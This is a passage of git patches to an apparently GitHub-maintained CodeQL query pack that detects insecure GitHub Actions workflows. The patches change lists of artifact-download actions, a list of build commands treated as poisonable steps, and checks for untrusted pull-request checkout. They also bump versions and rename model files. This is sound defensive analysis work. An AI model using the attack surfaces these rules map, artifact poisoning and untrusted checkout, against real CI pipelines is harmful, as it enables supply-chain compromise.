.github/action/src/codeql.ts | 1 + 2 files changed, 2 insertions(+) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 7bb3039fe486..240921205600 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28684,6 +28684,7 @@ async function codeqlDatabaseCreate(codeql) { } var database_path = path.join(temp, "codeql-actions-db"); var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; + source_root = path.join(source_root, "**", "*.yml"); await runCommand(codeql, [ "database", "create", diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 08c4b420a4ca..fe2f9b490298 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -121,6 +121,7 @@ export async function codeqlDatabaseCreate( var database_path = path.join(temp, "codeql-actions-db"); var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; + source_root = path.join(source_root, "**", "*.yml"); await runCommand(codeql, [ "database", From a84c1c4706b4fcce446e96aa7ddd6befdc6d9265 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 11:51:15 +0200 Subject: [PATCH 336/707] Minor improvemnts --- .../actions/security/ArtifactPoisoningQuery.qll | 13 +++++++------ ql/lib/codeql/actions/security/PoisonableSteps.qll | 5 +++-- 2 files changed, 10 insertions(+), 8 deletions(-) diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 45d9a08d00ab..060471bb5dce 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -20,12 +20,13 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep DownloadArtifactActionStep() { this.getCallee() = [ - "dawidd6/action-download-artifact", "marcofaggian/action-download-multiple-artifacts", - "benday-inc/download-latest-artifact", "blablacar/action-download-last-artifact", - "levonet/action-download-last-artifact", "bettermarks/action-artifact-download", - "aochmann/actions-download-artifact", "cytopia/download-artifact-retry-action", - "alextompkins/download-prior-artifact", "nmerget/download-gzip-artifact", - "benday-inc/download-artifact", "synergy-au/download-workflow-artifacts-action", + "actions/download-artifact", "dawidd6/action-download-artifact", + "marcofaggian/action-download-multiple-artifacts", "benday-inc/download-latest-artifact", + "blablacar/action-download-last-artifact", "levonet/action-download-last-artifact", + "bettermarks/action-artifact-download", "aochmann/actions-download-artifact", + "cytopia/download-artifact-retry-action", "alextompkins/download-prior-artifact", + "nmerget/download-gzip-artifact", "benday-inc/download-artifact", + "synergy-au/download-workflow-artifacts-action", "ishworkh/docker-image-artifact-download", "ishworkh/container-image-artifact-download", "sidx1024/action-download-artifact", "hyperskill/azblob-download-artifact", "ma-ve/action-download-artifact-with-retry" ] and diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 3349b5b11215..f80f09a32d8c 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -19,10 +19,11 @@ class DangerousActionUsesStep extends PoisonableStep, UsesStep { private string dangerousCommands() { result = [ - "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", + "npm i(nstall)?(\\b|$)", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", "msbuild ", "mvn ", "gradle ", "bundle install", "bundle exec ", "^ant ", "mkdocs build", - "pytest", "pip install -r ", "pip install --requirement", "java -jar " + "pytest", "pip install -r ", "pip install --requirement", "java -jar ", "poetry install", + "poetry run" ] } From 4b4901f99f5c16ee1510ad16598a70b667ff875d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 11:51:46 +0200 Subject: [PATCH 337/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 6a247cee330f..33c43429bd62 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.1.0 +version: 0.1.1 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 05f3408c578d..75624d6f1995 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.1.0 +version: 0.1.1 groups: [actions, queries] suites: codeql-suites extractor: javascript From bdaab69d0bb098395107c6300998c2d128c3e5e2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 15:09:37 +0200 Subject: [PATCH 338/707] Do not uses globs for source-root --- .github/action/dist/index.js | 1 - .github/action/src/codeql.ts | 1 - 2 files changed, 2 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 240921205600..7bb3039fe486 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28684,7 +28684,6 @@ async function codeqlDatabaseCreate(codeql) { } var database_path = path.join(temp, "codeql-actions-db"); var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; - source_root = path.join(source_root, "**", "*.yml"); await runCommand(codeql, [ "database", "create", diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index fe2f9b490298..08c4b420a4ca 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -121,7 +121,6 @@ export async function codeqlDatabaseCreate( var database_path = path.join(temp, "codeql-actions-db"); var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; - source_root = path.join(source_root, "**", "*.yml"); await runCommand(codeql, [ "database", From 1fdf76ac4116b6089f17c88a16ddbe2b7bd9bce5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 17 Jun 2024 15:17:46 +0200 Subject: [PATCH 339/707] Improve download artifact and untrusted checkout queries --- .../security/ArtifactPoisoningQuery.qll | 32 +++++++++++++------ .../security/UntrustedCheckoutQuery.qll | 19 +++++------ 2 files changed, 33 insertions(+), 18 deletions(-) diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 060471bb5dce..44c3c64a5a69 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -16,19 +16,33 @@ abstract class UntrustedArtifactDownloadStep extends Step { abstract string getPath(); } +class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep { + GitHubDownloadArtifactActionStep() { + // By default, the permissions are scoped so they can only download Artifacts within the current workflow run. + // To elevate permissions for this scenario, you can specify a github-token along with other repository and run identifiers + this.getCallee() = "actions/download-artifact" and + this.getArgument("run-id").matches("%github.event.workflow_run.id%") and + exists(this.getArgument("github-token")) + } + + override string getPath() { + if exists(this.getArgument("path")) then result = this.getArgument("path") else result = "" + } +} + class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep { DownloadArtifactActionStep() { this.getCallee() = [ - "actions/download-artifact", "dawidd6/action-download-artifact", - "marcofaggian/action-download-multiple-artifacts", "benday-inc/download-latest-artifact", - "blablacar/action-download-last-artifact", "levonet/action-download-last-artifact", - "bettermarks/action-artifact-download", "aochmann/actions-download-artifact", - "cytopia/download-artifact-retry-action", "alextompkins/download-prior-artifact", - "nmerget/download-gzip-artifact", "benday-inc/download-artifact", - "synergy-au/download-workflow-artifacts-action", "ishworkh/docker-image-artifact-download", - "ishworkh/container-image-artifact-download", "sidx1024/action-download-artifact", - "hyperskill/azblob-download-artifact", "ma-ve/action-download-artifact-with-retry" + "dawidd6/action-download-artifact", "marcofaggian/action-download-multiple-artifacts", + "benday-inc/download-latest-artifact", "blablacar/action-download-last-artifact", + "levonet/action-download-last-artifact", "bettermarks/action-artifact-download", + "aochmann/actions-download-artifact", "cytopia/download-artifact-retry-action", + "alextompkins/download-prior-artifact", "nmerget/download-gzip-artifact", + "benday-inc/download-artifact", "synergy-au/download-workflow-artifacts-action", + "ishworkh/docker-image-artifact-download", "ishworkh/container-image-artifact-download", + "sidx1024/action-download-artifact", "hyperskill/azblob-download-artifact", + "ma-ve/action-download-artifact-with-retry" ] and ( not exists(this.getArgument(["branch", "branch_name"])) or diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index ba31b0de500a..a9c92e70ee5e 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -93,7 +93,11 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt // 3rd party actions returning the PR head sha/ref exists(UsesStep step | ( - step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + step.getCallee() = + [ + "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch", + "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" + ] and // TODO: This should be read step of the head_sha or head_ref output vars this.getArgument("ref").matches("%.head_ref%") or @@ -229,10 +233,10 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { /** An If node that contains an actor, user or label check */ abstract class ControlCheck extends If { predicate dominates(Step step) { - step.getIf() = this or + step.getIf() = this or step.getEnclosingJob().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this } } @@ -259,7 +263,7 @@ class ActorControlCheck extends ControlCheck { .regexpFind([ "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", "\\bgithub\\.event\\.comment\\.user\\.login\\b", - "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", ], _, _) ) } @@ -270,10 +274,7 @@ class RepositoryControlCheck extends ControlCheck { // eg: github.repository == 'test/foo' exists( normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.repository\\b", - "\\bgithub\\.repository_owner\\b", - ], _, _) + .regexpFind(["\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b",], _, _) ) } } From c764b39c1842b433d043bb9c2b974e8abe46861a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 17 Jun 2024 17:11:10 +0200 Subject: [PATCH 340/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 33c43429bd62..10d9eeddcf71 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.1.1 +version: 0.1.2 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 75624d6f1995..16bad7c15bd3 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.1.1 +version: 0.1.2 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4619128c11ea18a55b04d9583e80fa16f2d6c66a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 20 Jun 2024 09:50:36 +0200 Subject: [PATCH 341/707] Move from githubsecuritylab packages to github --- .github/action/dist/index.js | 2 +- .github/action/src/codeql.ts | 2 +- ql/lib/ext/8398a7_action-slack.model.yml | 2 +- ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml | 2 +- ql/lib/ext/actions_github-script.model.yml | 2 +- ql/lib/ext/ahmadnassri_action-changed-files.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 4 ++-- ql/lib/ext/amannn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/anchore_sbom-action.model.yml | 2 +- ql/lib/ext/anchore_scan-action.model.yml | 2 +- ql/lib/ext/andresz1_size-limit-action.model.yml | 2 +- ql/lib/ext/android-actions_setup-android.model.yml | 2 +- ql/lib/ext/apple-actions_import-codesign-certs.model.yml | 2 +- ql/lib/ext/asdf-vm_actions.model.yml | 2 +- .../ext/ashley-taylor_read-json-property-action.model.yml | 2 +- ql/lib/ext/ashley-taylor_regex-property-action.model.yml | 2 +- ql/lib/ext/aszc_change-string-case-action.model.yml | 2 +- .../ext/aws-actions_configure-aws-credentials.model.yml | 2 +- ql/lib/ext/axel-op_googlejavaformat-action.model.yml | 2 +- ql/lib/ext/azure_powershell.model.yml | 2 +- ql/lib/ext/bahmutov_npm-install.model.yml | 2 +- ql/lib/ext/blackducksoftware_github-action.model.yml | 2 +- ql/lib/ext/bobheadxi_deployments.model.yml | 2 +- ql/lib/ext/bufbuild_buf-breaking-action.model.yml | 4 ++-- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 ++-- ql/lib/ext/bufbuild_buf-setup-action.model.yml | 2 +- ql/lib/ext/cachix_cachix-action.model.yml | 4 ++-- ql/lib/ext/changesets_action.model.yml | 2 +- ql/lib/ext/cloudflare_wrangler-action.model.yml | 2 +- ql/lib/ext/coursier_cache-action.model.yml | 2 +- ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml | 2 +- ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml | 2 +- ql/lib/ext/csexton_release-asset-action.model.yml | 2 +- ql/lib/ext/cycjimmy_semantic-release-action.model.yml | 2 +- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- ql/lib/ext/dailydotdev_action-devcard.model.yml | 2 +- .../danielpalme_reportgenerator-github-action.model.yml | 2 +- ql/lib/ext/daspn_private-actions-checkout.model.yml | 2 +- ql/lib/ext/dawidd6_action-ansible-playbook.model.yml | 2 +- ql/lib/ext/dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- .../determinatesystems_magic-nix-cache-action.model.yml | 2 +- ql/lib/ext/docker-practice_actions-setup-docker.model.yml | 2 +- ql/lib/ext/docker_build-push-action.model.yml | 2 +- ql/lib/ext/endbug_latest-tag.model.yml | 2 +- ql/lib/ext/expo_expo-github-action.model.yml | 2 +- .../ext/firebaseextended_action-hosting-deploy.model.yml | 2 +- ql/lib/ext/frabert_replace-string-action.model.yml | 2 +- ql/lib/ext/franzdiebold_github-env-vars-action.model.yml | 2 +- ql/lib/ext/gabrielbb_xvfb-action.model.yml | 2 +- ql/lib/ext/game-ci_unity-builder.model.yml | 2 +- ql/lib/ext/game-ci_unity-test-runner.model.yml | 2 +- ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml | 2 +- .../actions_actions-runner-controller.model.yml | 2 +- .../ext/generated/composite-actions/adap_flower.model.yml | 2 +- .../composite-actions/agoric_agoric-sdk.model.yml | 2 +- .../composite-actions/airbnb_lottie-ios.model.yml | 2 +- .../composite-actions/airbytehq_airbyte.model.yml | 2 +- .../composite-actions/amazon-ion_ion-java.model.yml | 2 +- .../generated/composite-actions/anchore_grype.model.yml | 2 +- .../generated/composite-actions/anchore_syft.model.yml | 2 +- .../composite-actions/angular_dev-infra.model.yml | 2 +- .../composite-actions/ansible_ansible-lint.model.yml | 2 +- .../ext/generated/composite-actions/ansible_awx.model.yml | 2 +- .../composite-actions/apache_arrow-datafusion.model.yml | 2 +- .../generated/composite-actions/apache_arrow-rs.model.yml | 2 +- .../generated/composite-actions/apache_arrow.model.yml | 2 +- .../composite-actions/apache_bookkeeper.model.yml | 2 +- .../ext/generated/composite-actions/apache_brpc.model.yml | 2 +- .../generated/composite-actions/apache_camel-k.model.yml | 2 +- .../generated/composite-actions/apache_camel.model.yml | 2 +- .../generated/composite-actions/apache_flink.model.yml | 2 +- .../apache_incubator-kie-tools.model.yml | 2 +- .../generated/composite-actions/apache_nuttx.model.yml | 2 +- .../generated/composite-actions/apache_opendal.model.yml | 2 +- .../generated/composite-actions/apache_pekko.model.yml | 2 +- .../composite-actions/apache_pulsar-helm-chart.model.yml | 2 +- .../generated/composite-actions/apache_superset.model.yml | 2 +- .../composite-actions/appflowy-io_appflowy.model.yml | 2 +- .../composite-actions/aptos-labs_aptos-core.model.yml | 2 +- .../archivesspace_archivesspace.model.yml | 2 +- .../composite-actions/armadaproject_armada.model.yml | 2 +- .../generated/composite-actions/armbian_build.model.yml | 2 +- .../composite-actions/auth0_auth0-java.model.yml | 2 +- .../generated/composite-actions/auth0_auth0.net.model.yml | 2 +- .../composite-actions/auth0_auth0.swift.model.yml | 2 +- .../composite-actions/autogluon_autogluon.model.yml | 2 +- .../generated/composite-actions/avaiga_taipy.model.yml | 2 +- .../composite-actions/aws-amplify_amplify-cli.model.yml | 2 +- .../aws-powertools_powertools-lambda-python.model.yml | 2 +- .../composite-actions/aws_amazon-vpc-cni-k8s.model.yml | 2 +- .../aws_karpenter-provider-aws.model.yml | 2 +- .../composite-actions/awslabs_amazon-eks-ami.model.yml | 2 +- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 2 +- .../composite-actions/azure_azure-datafactory.model.yml | 2 +- .../generated/composite-actions/badges_shields.model.yml | 2 +- .../composite-actions/balena-io_etcher.model.yml | 2 +- .../composite-actions/balena-os_balena-engine.model.yml | 2 +- .../composite-actions/ben-manes_caffeine.model.yml | 2 +- .../ext/generated/composite-actions/bokeh_bokeh.model.yml | 2 +- .../composite-actions/botpress_botpress.model.yml | 2 +- .../braintree_braintree-android-drop-in.model.yml | 2 +- .../braintree_braintree_android.model.yml | 2 +- .../composite-actions/broadinstitute_gatk.model.yml | 2 +- .../composite-actions/canonical_multipass.model.yml | 2 +- .../composite-actions/chia-network_actions.model.yml | 2 +- .../chia-network_chia-blockchain.model.yml | 2 +- .../composite-actions/chipsalliance_chisel.model.yml | 2 +- .../composite-actions/chocobozzz_peertube.model.yml | 2 +- .../composite-actions/cilium_cilium-cli.model.yml | 2 +- .../generated/composite-actions/cilium_cilium.model.yml | 2 +- .../generated/composite-actions/citusdata_citus.model.yml | 2 +- .../composite-actions/clerk_javascript.model.yml | 2 +- .../cloud-custodian_cloud-custodian.model.yml | 2 +- .../composite-actions/cloudflare_workers-sdk.model.yml | 2 +- .../cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../ext/generated/composite-actions/coder_coder.model.yml | 2 +- .../generated/composite-actions/coil-kt_coil.model.yml | 2 +- .../composite-actions/commaai_openpilot.model.yml | 2 +- .../conan-io_conan-center-index.model.yml | 2 +- .../composite-actions/corretto_corretto-8.model.yml | 2 +- .../composite-actions/cosmos_cosmos-sdk.model.yml | 2 +- .../generated/composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../ext/generated/composite-actions/cvc5_cvc5.model.yml | 2 +- .../generated/composite-actions/d2l-ai_d2l-en.model.yml | 2 +- .../danysk_build-check-deploy-gradle-action.model.yml | 2 +- .../composite-actions/datadog_dd-trace-dotnet.model.yml | 2 +- .../composite-actions/datadog_dd-trace-go.model.yml | 2 +- .../composite-actions/datadog_dd-trace-js.model.yml | 2 +- .../composite-actions/datafuselabs_databend.model.yml | 2 +- .../generated/composite-actions/davatorium_rofi.model.yml | 2 +- .../composite-actions/debezium_debezium.model.yml | 2 +- .../composite-actions/defenseunicorns_zarf.model.yml | 2 +- ...marches-simplifiees_demarches-simplifiees.fr.model.yml | 2 +- .../department-of-veterans-affairs_vets-website.model.yml | 2 +- .../composite-actions/devexpress_devextreme.model.yml | 2 +- .../generated/composite-actions/diggerhq_digger.model.yml | 2 +- .../generated/composite-actions/diku-dk_futhark.model.yml | 2 +- .../composite-actions/discourse_.github.model.yml | 2 +- .../generated/composite-actions/dnsjava_dnsjava.model.yml | 2 +- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../composite-actions/dotnet_docs-tools.model.yml | 2 +- .../composite-actions/dotnet_dotnet-monitor.model.yml | 2 +- .../composite-actions/dragonflydb_dragonfly.model.yml | 2 +- .../composite-actions/drawpile_drawpile.model.yml | 2 +- .../composite-actions/eksctl-io_eksctl.model.yml | 2 +- .../composite-actions/elastic_apm-agent-dotnet.model.yml | 2 +- .../composite-actions/elastic_apm-agent-java.model.yml | 2 +- .../composite-actions/elastic_apm-server.model copy.yml | 2 +- .../composite-actions/elementor_elementor.model.yml | 2 +- .../generated/composite-actions/emberjs_data.model.yml | 2 +- .../ext/generated/composite-actions/emqx_emqx.model.yml | 2 +- .../composite-actions/eonasdan_tempus-dominus.model.yml | 2 +- .../ext/generated/composite-actions/erlang_otp.model.yml | 2 +- .../generated/composite-actions/esphome_esphome.model.yml | 2 +- .../generated/composite-actions/expensify_app.model.yml | 2 +- .../ext/generated/composite-actions/expo_expo.model.yml | 2 +- .../composite-actions/expo_vscode-expo.model.yml | 2 +- .../external-secrets_external-secrets.model.yml | 2 +- .../generated/composite-actions/facebook_buck2.model.yml | 2 +- .../generated/composite-actions/facebook_flow.model.yml | 2 +- .../generated/composite-actions/facebook_yoga.model.yml | 2 +- .../composite-actions/facebookresearch_xformers.model.yml | 2 +- .../composite-actions/fastly_compute-actions.model.yml | 2 +- .../generated/composite-actions/felangel_bloc.model.yml | 2 +- .../composite-actions/firebase_firebase-ios-sdk.model.yml | 2 +- .../composite-actions/flagsmith_flagsmith.model.yml | 2 +- .../composite-actions/flaxengine_flaxengine.model.yml | 2 +- .../flipperdevices_flipperzero-firmware.model.yml | 2 +- .../generated/composite-actions/fluxcd_flux2.model.yml | 2 +- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../generated/composite-actions/fossasia_visdom.model.yml | 2 +- .../composite-actions/freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 2 +- .../generated/composite-actions/gaphor_gaphor.model.yml | 2 +- .../composite-actions/getsentry_action-release.model.yml | 2 +- .../composite-actions/github_codeql-action.model.yml | 2 +- .../ext/generated/composite-actions/github_ruby.model.yml | 2 +- .../composite-actions/gittools_gitversion.model.yml | 2 +- .../composite-actions/go-spatial_tegola.model.yml | 2 +- .../composite-actions/goauthentik_authentik.model.yml | 2 +- .../composite-actions/godotengine_godot.model.yml | 2 +- .../generated/composite-actions/google_dagger.model.yml | 2 +- .../composite-actions/googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- .../googlecloudplatform_dataflowtemplates.model.yml | 4 ++-- .../googlecloudplatform_magic-modules.model.yml | 2 +- .../composite-actions/gravitational_teleport.model.yml | 2 +- .../composite-actions/grote_transportr.model.yml | 2 +- .../generated/composite-actions/hashicorp_nomad.model.yml | 2 +- .../composite-actions/hashicorp_terraform.model.yml | 2 +- .../generated/composite-actions/hashicorp_vault.model.yml | 4 ++-- .../composite-actions/home-assistant_android.model.yml | 2 +- .../composite-actions/homebrew_actions.model.yml | 2 +- .../hyperledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 2 +- .../composite-actions/igniterealtime_openfire.model.yml | 2 +- .../composite-actions/infracost_actions.model.yml | 2 +- .../inspektor-gadget_inspektor-gadget.model.yml | 2 +- .../composite-actions/intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 2 +- .../composite-actions/ionic-team_ionicons.model.yml | 2 +- .../composite-actions/ionic-team_stencil.model.yml | 2 +- .../ext/generated/composite-actions/ipfs_aegir.model.yml | 2 +- .../jetbrains_jetbrainsruntime.model.yml | 2 +- .../jhipster_generator-jhipster.model.yml | 4 ++-- .../composite-actions/jsocol_django-ratelimit.model.yml | 2 +- .../composite-actions/juicedata_juicefs.model.yml | 2 +- .../composite-actions/jupyter_docker-stacks.model.yml | 2 +- .../composite-actions/keycloak_keycloak.model.yml | 2 +- .../generated/composite-actions/kserve_kserve.model.yml | 2 +- .../generated/composite-actions/kubeflow_katib.model.yml | 2 +- .../kubeflow_training-operator.model.yml | 2 +- .../composite-actions/kubernetes-sigs_karpenter.model.yml | 2 +- .../composite-actions/kubernetes-sigs_kwok.model.yml | 2 +- .../composite-actions/kubescape_kubescape.model.yml | 2 +- .../composite-actions/kubeshop_botkube.model.yml | 2 +- .../generated/composite-actions/kyverno_kyverno.model.yml | 2 +- .../generated/composite-actions/lancedb_lance.model.yml | 2 +- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 2 +- .../composite-actions/ldc-developers_ldc.model.yml | 2 +- .../composite-actions/ledgerhq_ledger-live.model.yml | 2 +- .../ext/generated/composite-actions/lerna_lerna.model.yml | 2 +- .../ext/generated/composite-actions/lf-edge_eve.model.yml | 2 +- .../generated/composite-actions/libgit2_libgit2.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../composite-actions/lightning-ai_torchmetrics.model.yml | 2 +- .../composite-actions/linkerd_linkerd2.model.yml | 4 ++-- .../composite-actions/logseq_publish-spa.model.yml | 2 +- .../composite-actions/macvim-dev_macvim.model.yml | 2 +- .../generated/composite-actions/mamba-org_mamba.model.yml | 2 +- .../composite-actions/maplibre_maplibre-native.model.yml | 2 +- .../composite-actions/mastodon_mastodon.model.yml | 2 +- .../composite-actions/mavlink_qgroundcontrol.model.yml | 2 +- .../composite-actions/mdanalysis_mdanalysis.model.yml | 2 +- .../generated/composite-actions/medic_cht-core.model.yml | 2 +- .../generated/composite-actions/medusajs_medusa.model.yml | 2 +- .../composite-actions/metabase_metabase.model.yml | 2 +- .../metamask_action-create-release-pr.model.yml | 2 +- .../metamask_action-npm-publish.model.yml | 2 +- .../composite-actions/microsoft_fluentui.model.yml | 2 +- .../composite-actions/microsoft_playwright.model.yml | 2 +- .../generated/composite-actions/microsoft_wsl.model.yml | 2 +- .../composite-actions/milvus-io_milvus.model.yml | 2 +- .../generated/composite-actions/mlflow_mlflow.model.yml | 2 +- .../composite-actions/modin-project_modin.model.yml | 2 +- .../composite-actions/mozilla_addons-server.model.yml | 2 +- .../generated/composite-actions/mozilla_bedrock.model.yml | 2 +- .../generated/composite-actions/mozilla_sccache.model.yml | 2 +- .../composite-actions/msys2_setup-msys2.model.yml | 2 +- .../composite-actions/mumble-voip_mumble.model.yml | 2 +- .../ext/generated/composite-actions/nasa_fprime.model.yml | 2 +- .../composite-actions/nats-io_nats-server.model.yml | 2 +- ...form-actions_optic-release-automation-action.model.yml | 2 +- .../ext/generated/composite-actions/nektos_act.model.yml | 2 +- .../neo4j-contrib_neo4j-apoc-procedures.model.yml | 2 +- .../composite-actions/neondatabase_neon.model.yml | 2 +- .../generated/composite-actions/neovim_neovim.model.yml | 2 +- .../ext/generated/composite-actions/nhost_nhost.model.yml | 2 +- .../composite-actions/nix-community_nixos-wsl.model.yml | 2 +- .../ext/generated/composite-actions/novuhq_novu.model.yml | 4 ++-- .../ext/generated/composite-actions/nymtech_nym.model.yml | 2 +- .../composite-actions/obsproject_obs-studio.model.yml | 2 +- .../ext/generated/composite-actions/ocaml_dune.model.yml | 2 +- .../composite-actions/oneflow-inc_oneflow.model.yml | 2 +- .../open-telemetry_opentelemetry-ruby-contrib.model.yml | 2 +- .../open-telemetry_opentelemetry-ruby.model.yml | 2 +- .../open-watcom_open-watcom-v2.model.yml | 2 +- .../openapitools_openapi-generator.model.yml | 2 +- .../ext/generated/composite-actions/openjdk_jdk.model.yml | 2 +- .../opensearch-project_opensearch-net.model.yml | 2 +- .../opensearch-project_security.model.yml | 2 +- .../composite-actions/opentrons_opentrons.model.yml | 2 +- .../composite-actions/openvinotoolkit_openvino.model.yml | 2 +- ...nzeppelin_openzeppelin-contracts-upgradeable.model.yml | 2 +- .../openzeppelin_openzeppelin-contracts.model.yml | 2 +- .../ext/generated/composite-actions/oppia_oppia.model.yml | 2 +- .../generated/composite-actions/oracle_graal.model.yml | 2 +- .../composite-actions/oracle_truffleruby.model.yml | 2 +- .../generated/composite-actions/orhun_git-cliff.model.yml | 2 +- .../ext/generated/composite-actions/oven-sh_bun.model.yml | 2 +- .../composite-actions/owntracks_android.model.yml | 2 +- .../composite-actions/pandas-dev_pandas.model.yml | 2 +- .../composite-actions/pardeike_harmony.model.yml | 2 +- .../composite-actions/pennylaneai_pennylane.model.yml | 2 +- .../composite-actions/phalcon_cphalcon.model.yml | 2 +- .../philosowaffle_peloton-to-garmin.model.yml | 4 ++-- .../ext/generated/composite-actions/php_php-src.model.yml | 2 +- .../phpdocumentor_phpdocumentor.model.yml | 2 +- .../pinecone-io_pinecone-python-client.model.yml | 2 +- .../generated/composite-actions/pixijs_pixijs.model.yml | 2 +- .../generated/composite-actions/posthog_posthog.model.yml | 2 +- .../generated/composite-actions/primer_react.model.yml | 2 +- .../project-chip_connectedhomeip.model.yml | 2 +- .../composite-actions/projectnessie_nessie.model.yml | 2 +- .../ext/generated/composite-actions/psf_black.model.yml | 2 +- .../composite-actions/pyca_cryptography.model.yml | 2 +- 